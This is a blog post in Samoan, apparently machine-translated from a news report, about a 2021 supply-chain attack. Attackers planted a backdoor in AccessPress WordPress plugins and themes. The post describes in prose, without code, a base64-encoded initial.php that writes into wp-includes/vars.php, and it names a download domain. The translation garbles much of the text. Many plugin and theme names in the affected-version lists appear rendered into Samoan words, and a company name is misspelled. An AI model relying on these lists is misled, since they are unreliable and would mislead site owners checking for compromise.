ProHoster > Blog > talafou initaneti > Backdoor i 93 AccessPress plugins ma autu na faʻaaogaina i luga o 360 afe nofoaga

Backdoor i 93 AccessPress plugins ma autu na faʻaaogaina i luga o 360 afe nofoaga

Na mafai e le au osofaʻi ona faʻapipiʻi se backdoor i totonu o 40 plugins ma 53 autu mo le WordPress content management system, na atiaʻe e AccessPress, lea e fai mai o ana faʻaopoopoga o loʻo faʻaaogaina i luga o le 360 ​​afe nofoaga. O taunuuga o le auʻiliʻiliga o le mea na tupu e leʻi tuʻuina atu, ae ua manatu o le tulafono leaga na faʻafeiloaʻi i le taimi o le fetuutuunai o le upega tafaʻilagi a AccessPress, faia suiga i faʻamaumauga o loʻo ofoina atu mo le siiina mai ma faʻasalalauga ua uma ona tuʻuina atu, talu ai o loʻo i ai le backdoor. na'o le fa'ailoga fa'asoa e ala i le 'upega tafa'ilagi aloaia a AccessPress, ae e le o iai i na fa'asalalauga tutusa o fa'aopoopoga fa'asoa fa'atasi i le WordPress.org directory.

O suiga leaga na maua e se tagata suʻesuʻe i JetPack (se vaevaega o le WordPress developer Automatic) aʻo suʻesuʻeina tulafono leaga o loʻo maua i luga o le upega tafaʻilagi a le kalani. O se auʻiliʻiliga o le tulaga na faʻaalia ai o suiga leaga na i ai i le WordPress add-on na sii mai i luga o le upega tafaʻilagi aloaia AccessPress. O isi fa'aopoopoga mai le kamupani lava e tasi na fa'apena fo'i i suiga leaga na fa'atagaina le avanoa atoa i le saite ma aia tatau fa'afoe.

I le taimi o le suiga, na faʻaopoopoina e le au osofaʻi le faila "initial.php" i faʻamaumauga faʻatasi ma plugins ma autu, lea na fesoʻotaʻi e ala i le "include" directive i le "functions.php" faila. Ina ia fenumiai le ala, o mea leaga i totonu o le faila "initial.php" na faʻapipiʻiina e avea o se poloka faʻapipiʻi base64 o faʻamaumauga. O le faʻapipiʻi leaga, i lalo o le faʻailoga o le mauaina o se ata mai le upega tafaʻilagi wp-theme-connect.com, faʻapipiʻi saʻo le code backdoor i le faila wp-includes/vars.php.

Backdoor i 93 AccessPress plugins ma autu na faʻaaogaina i luga o 360 afe nofoaga
Backdoor i 93 AccessPress plugins ma autu na faʻaaogaina i luga o 360 afe nofoaga

O nofoaga muamua na aofia ai suiga leaga i faʻaopoopoga AccessPress na faʻaalia ia Setema 2021. E fa'apea o le taimi lea na fa'aofi ai le faitoto'a i tua i totonu o fa'aopoopoga. O le faʻamatalaga muamua i le AccessPress e uiga i le faʻafitauli faʻaalia e leʻi taliina, ma na mafai e AccessPress ona faʻalogoina ina ua uma ona faʻaaofia ai le WordPress.org team i le suʻesuʻega. I le aso 15 o Oketopa, 2021, na ave'esea ai fa'amaumauga na a'afia i le faitoto'a i tua mai le upega tafa'ilagi a le AccessPress, ma fa'alauiloa fou fa'aopoopo i le aso 17 o Ianuari, 2022.

Sucuri suʻesuʻe eseese nofoaga na faʻapipiʻiina ai lomiga o AccessPress ma faʻaalia ai le i ai o faʻaoga leaga na faʻapipiʻiina i totonu o se faitotoa pito i tua na lafoina ai le spam ma toe faʻafeiloaʻi suiga i nofoaga taufaasese (o modules na tusia i le 2019 ma le 2020). E fa'apea na fa'atau atu e le au tusitala o le faitoto'a tua le avanoa i nofoaga fa'aletonu.

Autu o lo'o fa'amauina ai le suitulaga i tua:

  • accessbuddy 1.0.0
  • accesspress-basic 3.2.1
  • accesspress-lite 2.92
  • accesspress-mag 2.6.5
  • accesspress-parallax 4.5
  • accesspress-ray 1.19.5
  • accesspress-root 2.5
  • accesspress-staple 1.9.1
  • accesspress-faleoloa 2.4.9
  • lala sooupu-lite 1.1.6
  • fa'atatau 1.0.6
  • bingle 1.0.4
  • blogger 1.2.6
  • fausiaina-lite 1.2.5
  • doko 1.0.27
  • fa'amalamalama 1.3.5
  • fashstore 1.2.1
  • ata pue 2.4.0
  • gaga-corp 1.0.8
  • gaga-lite 1.4.2
  • tasi le avanoa 2.2.8
  • parallax-blog 3.1.1574941215
  • parallaxsome 1.3.6
  • punte 1.1.2
  • taamilo 1.3.1
  • galugalu 1.2.0
  • scrollme 2.1.0
  • sportsmag 1.2.1
  • storevilla 1.4.1
  • swing-lite 1.1.9
  • le-launcher 1.3.2
  • le-aso Gafua 1.4.1
  • uncode-lite 1.3.1
  • unicon-lite 1.2.6
  • vmag 1.2.7
  • vmagazine-lite 1.3.5
  • vmagazine-tala fou 1.0.5
  • zigcy-pepe 1.0.6
  • zigcy-cosmetics 1.0.5
  • zigcy-lite 2.0.9

Plugins lea na iloa ai le suitulaga i tua:

  • accesspress-anonymous-post 2.8.0 2.8.1 1
  • accesspress-custom-css 2.0.1 2.0.2
  • accesspress-custom-post-type 1.0.8 1.0.9
  • accesspress-facebook-auto-post 2.1.3 2.1.4
  • accesspress-instagram-feed 4.0.3 4.0.4
  • accesspress-pinterest 3.3.3 3.3.4
  • accesspress-social-counter 1.9.1 1.9.2
  • accesspress-social-icons 1.8.2 1.8.3
  • accesspress-social-login-lite 3.4.7 3.4.8
  • accesspress-social-share 4.5.5 4.5.6
  • accesspress-twitter-auto-post 1.4.5 1.4.6
  • accesspress-twitter-feed 1.6.7 1.6.8
  • ak-menu-icons-lite 1.0.9
  • ap-soa 1.0.7 2
  • ap-contact-form 1.0.6 1.0.7
  • ap-aganuu-molimau 1.4.6 1.4.7
  • ap-mega-menu 3.0.5 3.0.6
  • ap-pricing-tables-lite 1.1.2 1.1.3
  • apex-notification-bar-lite 2.0.4 2.0.5
  • cf7-faleoloa-i-db-lite 1.0.9 1.1.0
  • comments-disable-accesspress 1.0.7 1.0.8
  • faigofie-itu-tab-cta 1.0.7 1.0.8
  • everest-admin-theme-lite 1.0.7 1.0.8
  • everest-sau-soon-lite 1.1.0 1.1.1
  • everest-comment-rating-lite 2.0.4 2.0.5
  • everest-counter-lite 2.0.7 2.0.8
  • everest-faq-manager-lite 1.0.8 1.0.9
  • everest-gallery-lite 1.0.8 1.0.9
  • everest-google-places-reviews-lite 1.0.9 2.0.0
  • everest-review-lite 1.0.7
  • everest-tab-lite 2.0.3 2.0.4
  • everest-timeline-lite 1.1.1 1.1.2
  • inline-call-to-action-builder-lite 1.1.0 1.1.1
  • oloa-slider-mo-woocommerce-lite 1.1.5 1.1.6
  • smart-logo-showcase-lite 1.1.7 1.1.8
  • smart-scroll-posts 2.0.8 2.0.9
  • smart-scroll-to-top-lite 1.0.3 1.0.4
  • aofa'i-gdpr-tausia-lite 1.0.4
  • atoa-au-lite 1.1.1 1.1.2
  • sili-tusitala-pusa-lite 1.1.2 1.1.3
  • sili-fomu-fausia-lite 1.5.0 1.5.1
  • woo-badge-designer-lite 1.1.0 1.1.1
  • wp-1-slider 1.2.9 1.3.0
  • wp-blog-manager-lite 1.1.0 1.1.2
  • wp-comment-designer-lite 2.0.3 2.0.4
  • wp-cookie-user-info 1.0.7 1.0.8
  • wp-facebook-review-showcase-lite 1.0.9
  • wp-fb-messenger-button-lite 2.0.7
  • wp-floating-menu 1.4.4 1.4.5
  • wp-media-manager-lite 1.1.2 1.1.3
  • wp-popup-fuʻa 1.2.3 1.2.4
  • wp-popup-lite 1.0.8
  • wp-product-gallery-lite 1.1.1

puna: opennet.ru

Faaopoopo i ai se faamatalaga